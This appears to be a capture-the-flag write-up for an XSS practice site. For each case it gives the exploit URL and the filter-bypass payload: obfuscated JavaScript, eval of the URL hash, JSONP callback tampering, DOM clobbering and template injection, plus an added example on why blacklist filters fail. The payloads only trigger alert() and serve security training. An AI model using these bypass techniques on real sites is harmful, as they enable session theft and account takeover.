https://xss.shift-js.info/case01.php?payload=%3Cimg+onerror%3Dalert%28%27XSS%27%29+src%3D%2F%3E
Simple
<img onerror=alert('XSS') src=/>
https://xss.shift-js.info/case02.php#%3Cimg%20onerror=alert(document.domain)%20src=/%3E
Put it in the hash (fragment).
<img onerror=alert(document.domain) src=/>
https://xss.shift-js.info/case03.php?payload=javascript%3Aalert%28%22XSS%22%29
Take advantage of the a tag.
javascript:alert("XSS")
https://xss.shift-js.info/case04-1.php?payload=%24%7Balert%28%27XSS%27%29%7D
https://xss.shift-js.info/case04-2.php?payload=%24%7Balert%28%27XSS%27%29%7D
Executed inside a template literal: ${alert('XSS')}
https://xss.shift-js.info/case05.php?payload=%24%3D~%5B%5D%3B%24%3D%7B___%3A%2B%2B%24%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C__%24%3A%2B%2B%24%2C%24_%24_%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C_%24_%3A%2B%2B%24%2C%24_%24%24%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24_%24%3A%28%24%5B%24%5D%2B%22%22%29%5B%24%5D%2C_%24%24%3A%2B%2B%24%2C%24%24%24_%3A%28%21%22%22%2B%22%22%29%5B%24%5D%2C%24__%3A%2B%2B%24%2C%24_%24%3A%2B%2B%24%2C%24%24__%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24_%3A%2B%2B%24%2C%24%24%24%3A%2B%2B%24%2C%24___%3A%2B%2B%24%2C%24__%24%3A%2B%2B%24%7D%3B%24.%24_%3D%28%24.%24_%3D%24%2B%22%22%29%5B%24.%24_%24%5D%2B%28%24._%24%3D%24.%24_%5B%24.__%24%5D%29%2B%28%24.%24%24%3D%28%24.%24%2B%22%22%29%5B%24.__%24%5D%29%2B%28%28%21%24%29%2B%22%22%29%5B%24._%24%24%5D%2B%28%24.__%3D%24.%24_%5B%24.%24%24_%5D%29%2B%28%24.%24%3D%28%21%22%22%2B%22%22%29%5B%24.__%24%5D%29%2B%28%24._%3D%28%21%22%22%2B%22%22%29%5B%24._%24_%5D%29%2B%24.%24_%5B%24.%24_%24%5D%2B%24.__%2B%24._%24%2B%24.%24%3B%24.%24%24%3D%24.%24%2B%28%21%22%22%2B%22%22%29%5B%24._%24%24%5D%2B%24.__%2B%24._%2B%24.%24%2B%24.%24%24%3B%24.%24%3D%28%24.___%29%5B%24.%24_%5D%5B%24.%24_%5D%3B%24.%24%28%24.%24%28%24.%24%24%2B%22%5C%22%22%2B%24.%24_%24_%2B%28%21%5B%5D%2B%22%22%29%5B%24._%24_%5D%2B%24.%24%24%24_%2B%22%5C%5C%22%2B%24.__%24%2B%24.%24%24_%2B%24._%24_%2B%24.__%2B%22%28%5C%5C%5C%22%5C%5C%22%2B%24.__%24%2B%24._%24%24%2B%24.___%2B%22%5C%5C%22%2B%24.__%24%2B%24._%24_%2B%24._%24%24%2B%22%5C%5C%22%2B%24.__%24%2B%24._%24_%2B%24._%24%24%2B%22%5C%5C%5C%22%5C%5C%22%2B%24.%24__%2B%24.___%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3B
alert('XSS')
⤵
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$._$$+"\\\"\\"+$.$__+$.___+")"+"\"")())();
https://xss.shift-js.info/case06.php?payload=%3Cscript%3E+document%5B%60locati%24%7B%22o%22%7Dn%60%5D%3D%60javascript%3Aalert%24%7B%5Batob%2B%22%22%5D%5B0%5D%5B13%5D%7D%27XSS%27%24%7B%5Batob%2B%22%22%5D%5B0%5D%5B14%5D%7D%60+%3C%2Fscript%3E
$escaped = preg_replace("/[()]/", "", $_GET['payload']);
$escaped = preg_replace("/[oO][nN]/", "", $escaped);
Parentheses can't be used, so it ends up being executed via document.location=javascript:~.
Also on/ON/On/oN are rejected, so that is dodged in an ad hoc way.
<script>
document[`locati${"o"}n`]=`javascript:alert${[atob+""][0][13]}'XSS'${[atob+""][0][14]}`
</script>
<script>
t=[b+""][0][7];window[`docume${t}t`][`locatio${t}`]=`javascript:alert${[atob+""][0][13]}'XSS'${[atob+""][0][14]}`
</script>
o/O followed by n/N can't be used, so n is stored in an arbitrary variable.
https://xss.shift-js.info/case07-1.php?payload=<script>eval%28location.hash.substring%281%29%29<%2Fscript>#javascript:alert('XSS')
https://xss.shift-js.info/case07-2.php?payload=<script>eval%28location.hash.substring%281%29%29<%2Fscript>#javascript:alert('XSS')
<script>eval(location.hash.substring(1))</script>
#alert('XSS')
The various quote characters can't be used, so I put it in the hash and ran it with eval, but it can also be solved like this...
<script>eval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41))</script>
I threw it together roughly like this:
"<script>eval(String.fromCharCode("+ `alert("XSS")`.split("").map(s=>s.charCodeAt(0)).join() +"))</script>"
https://xss.shift-js.info/case08.php?payload=%22+onmouseover%3D%27document.location%3D%22javascript%3Aalert%22%2B%5Batob%2B%22%22%5D%5B0%5D%5B13%5D%2B%5Balert%2B%22%22%5D%5B0%5D%5B19%5D+%2B+%22XSS%22+%2B+%5Balert%2B%22%22%5D%5B0%5D%5B19%5D+%2B%5Batob%2B%22%22%5D%5B0%5D%5B14%5D%27
I took the parentheses () from a convenient place (atob).
Also, since I couldn't break out of the tag, I fudged it with OnMouseOver...
" onmouseover='document.location="javascript:alert"+[atob+""][0][13]+[alert+""][0][19] + "XSS" + [alert+""][0][19] +[atob+""][0][14]'
https://xss.shift-js.info/case09.php?payload=%3Cscrscriptipt%3Ealert%28%27XSS%27%29%3C%2Fscrscriptipt%3E
$escaped = preg_replace("/\s/", "", $_GET['payload']);
$escaped = preg_replace("/script/", "", $escaped);
<scrscriptipt>alert('XSS')</scrscriptipt>
or
<s cript>alert('XSS')</s cript>
also worked.
The escaping was sloppy, so this may have been the easiest one...
Use slashes in place of whitespace:
<img/src="1"/onerror=alert("XSS")>
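The case06 and case09 filters quoted above are both single-pass blacklist strips, which is why their output can still contain the very thing they strip. The following is an added example, not code from the writeup or from the challenge site: it transliterates the two PHP preg_replace chains to JavaScript (assumption: same regexes, same order), adds an idempotency check that flags such filters, and contrasts them with HTML entity encoding, which is the mitigation for this output context.

```javascript
// Added example, not code from the original writeup: the two PHP
// blacklist filters quoted above transliterated to JavaScript
// (assumption: same regexes applied in the same order), a check that
// exposes why strip-once filters fail, and the output encoding that
// actually neutralises markup in an HTML body context.

// case06 filter: drop parentheses, then drop "on" case-insensitively.
function case06Filter(input) {
  return input.replace(/[()]/g, "").replace(/[oO][nN]/g, "");
}

// case09 filter: drop whitespace, then drop the literal "script".
function case09Filter(input) {
  return input.replace(/\s/g, "").replace(/script/g, "");
}

// A strip filter is only sound if its own output contains nothing it
// would strip again. Applying it a second time is a cheap audit.
function isIdempotent(filter, input) {
  const once = filter(input);
  return filter(once) === once;
}

// Mitigation for HTML body/attribute context: encode every character
// that can open a tag or terminate an attribute, instead of guessing
// which words are dangerous. Pick the encoder that matches the output
// context (JS string, URL, ...) when the sink is not HTML text.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Sample inputs: the case09 payload quoted above, and a constructed
// benign sentence showing that blacklisting also corrupts normal text.
const CASE09_PAYLOAD = "<scrscriptipt>alert('XSS')</scrscriptipt>";
const BENIGN_TEXT = "Monday (noon)";

function demo() {
  return {
    stripped: case09Filter(CASE09_PAYLOAD),                 // reassembles <script>
    idempotent: isIdempotent(case09Filter, CASE09_PAYLOAD), // false: filter is unsound
    benignMangled: case06Filter(BENIGN_TEXT),               // "Mday no": false positive
    encoded: escapeHtml(CASE09_PAYLOAD),                    // no "<" or ">" survives
  };
}
```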
https://xss.shift-js.info/case20.php?payload=%3Cscript+src%3D%27https%3A%2F%2Fxss.shift-js.info%2Fjsonp.php%3Fcallback%3Dalert%28%2522XSS%2522%29%27%3E%3C%2Fscript%3E
Tamper with the JSONP callback.
<script src='https://xss.shift-js.info/jsonp.php?callback=alert(%22XSS%22)'></script>
https://xss.shift-js.info/case21.php?payload=%22+id%3D1+%3Cinput+id%3D%22equation%22+value%3Dalert%28%22XSS%22%29%3E%3C/body%3E%3C!--
Overwrite the value of equation.
" id=1 <input id="equation" value=alert("XSS")></body><!--
https://xss.shift-js.info/case22.php?payload=%7B%7Bconstructor.constructor%28%27alert%28%22XSS%22%29%27%29%28%29%7D%7D
I used this as a reference.
{{constructor.constructor('alert("XSS")')()}}
https://xss.shift-js.info/case23.php?payload=alert%28%27XSS%27%29%2F%2F%3Cscript+id%3D%22injectarea%22%3E%3C%2Fscript%3E%3Cdiv+id%3D
I used this as a reference.
alert('XSS')//<script id="injectarea"></script><div id=